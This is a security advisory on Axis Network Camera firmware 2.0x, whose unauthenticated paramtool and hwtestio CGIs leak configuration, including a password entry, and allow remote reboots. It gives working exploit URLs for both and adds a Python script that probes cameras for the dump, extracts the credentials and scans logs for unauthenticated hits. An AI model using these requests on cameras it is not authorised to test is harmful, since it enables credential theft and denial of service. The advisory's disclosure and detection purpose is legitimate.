Axis Network Cameras suffer from a security flaw in the CGI programs they ship with: the CGIs can be accessed without any authentication, even though they reveal a great deal of sensitive information.
Credit:
The information has been provided by Torgeir Hansen.
Vulnerable systems:
Axis Network Cameras firmware 2.0x
Immune systems:
Axis Network Cameras firmware 2.12 and above
The Axis Network Cameras contain two CGIs, /cgi-bin/paramtool and /cgi-bin/hwtestio, which can be requested without authentication of any kind. This appears to be a misconfiguration of the camera's web server.
Paramtool can be used like this: http://<ip_to_webcam>/cgi-bin/paramtool?--blargh
This dumps the entire configuration of the webcam, including the password section:
root.InternalSecurity.Passwd { root { passwd [ "plAsx1.0CzA.wd" ] (...)
It can also reveal dial-up information such as phone numbers, usernames and passwords (if the camera is set up to serve images over a dial-up connection).
The second CGI, /cgi-bin/hwtestio, is even worse to leave open: it lets anyone restart the camera as many times as they want ("for testing purposes", of course), which amounts to a remote denial of service.
Example:
Requesting http://<ip_to_webcam>/cgi-bin/hwtestio?-r242424 restarts the camera.
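The following script is an added example, not part of the original advisory or of Axis firmware. It does two things a practitioner would want: it probes a camera for an unauthenticated /cgi-bin/paramtool dump and pulls the password entries out of it using the record shape shown above, and it scans web-server access logs for hits on either CGI that were served without credentials. The hostnames, the sample paramtool output and the log lines are constructed for illustration; the only real details taken from the advisory are the two CGI paths, the ?--blargh and ?-r242424 arguments and the format of the root.InternalSecurity.Passwd record. The script deliberately never requests hwtestio with -r, since that would reboot the target.

```python
import re
import sys
import urllib.request
from urllib.error import HTTPError, URLError

# CGI paths named in the advisory. hwtestio is only used for log matching here:
# requesting it with -r... restarts the camera, so it is never probed actively.
PARAMTOOL_PATH = "/cgi-bin/paramtool?--blargh"
SENSITIVE_CGIS = ("/cgi-bin/paramtool", "/cgi-bin/hwtestio")

# Matches the password record shape quoted in the advisory:
#   root.InternalSecurity.Passwd { root { passwd [ "plAsx1.0CzA.wd" ] ...
PASSWD_RE = re.compile(
    r'([\w.]+\.Passwd)\s*\{\s*(\w+)\s*\{\s*passwd\s*\[\s*"([^"]*)"\s*\]'
)

# Common Log Format: client, ident, authuser, [time], "METHOD path HTTP/x", status
CLF_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample of what an unauthenticated paramtool dump might look like.
# Only the Passwd line follows the advisory; the Network line is made up.
SAMPLE_PARAMTOOL = '''\
root.Network { IPAddress [ "192.0.2.10" ] }
root.InternalSecurity.Passwd { root { passwd [ "plAsx1.0CzA.wd" ] } }
'''

# Constructed access-log lines (hosts and timestamps are invented).
LOG_SAMPLE = '''\
192.0.2.5 - - [01/Jan/2001:10:12:01 +0100] "GET /cgi-bin/paramtool?--blargh HTTP/1.0" 200 18422
192.0.2.5 - - [01/Jan/2001:10:12:09 +0100] "GET /cgi-bin/hwtestio?-r242424 HTTP/1.0" 200 0
192.0.2.9 - - [01/Jan/2001:10:15:33 +0100] "GET /cgi-bin/paramtool?--blargh HTTP/1.0" 401 0
192.0.2.7 - - [01/Jan/2001:10:16:00 +0100] "GET /jpg/image.jpg HTTP/1.0" 200 30211
'''


def extract_passwords(paramtool_output):
    """Return (section, user, password) triples found in a paramtool dump."""
    return PASSWD_RE.findall(paramtool_output)


def fetch_unauthenticated(url, timeout=5):
    """GET url with no credentials; return (status, body). status is None on connect failure."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("latin-1", "replace")
    except HTTPError as err:
        return err.code, ""
    except URLError:
        return None, ""


def check_camera(host, fetch=fetch_unauthenticated):
    """Probe one camera for the paramtool disclosure. A 200 whose body carries the
    root.* parameter tree (heuristic) is treated as exposed; a 401 means fixed."""
    status, body = fetch(f"http://{host}{PARAMTOOL_PATH}")
    findings = {"host": host, "status": status, "paramtool_exposed": False, "credentials": []}
    if status == 200 and "root." in body:
        findings["paramtool_exposed"] = True
        findings["credentials"] = extract_passwords(body)
    return findings


def find_unauthenticated_cgi_hits(log_text):
    """Return (client, path, status) for successful requests to either CGI where
    the authuser field is '-', i.e. the server answered without authentication."""
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        client, user, _method, path, status = m.groups()
        if path.split("?", 1)[0] in SENSITIVE_CGIS and user == "-" and status == "200":
            hits.append((client, path, status))
    return hits


if __name__ == "__main__":
    # Usage: python axis_cgi_check.py <camera_host> [access.log]
    target = sys.argv[1]
    result = check_camera(target)
    print(f"{target}: paramtool status={result['status']} exposed={result['paramtool_exposed']}")
    for section, user, _pw in result["credentials"]:
        print(f"  credential disclosed: {section} user={user}")  # password not echoed
    if len(sys.argv) > 2:
        with open(sys.argv[2], encoding="latin-1") as fh:
            for client, path, status in find_unauthenticated_cgi_hits(fh.read()):
                print(f"  log hit: {client} {path} -> {status}")
```

Run against a camera you are authorised to test; a 401 on paramtool is consistent with the fixed firmware, a 200 with a root.* tree means the disclosure is still present. The log scan flags the paramtool dump and the hwtestio restart from the unauthenticated client, but not the refused (401) request or ordinary image fetches, so it is a usable starting point for retrospective hunting in web-server logs.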
Solution:
Upgrading to firmware 2.12 or later fixes both issues.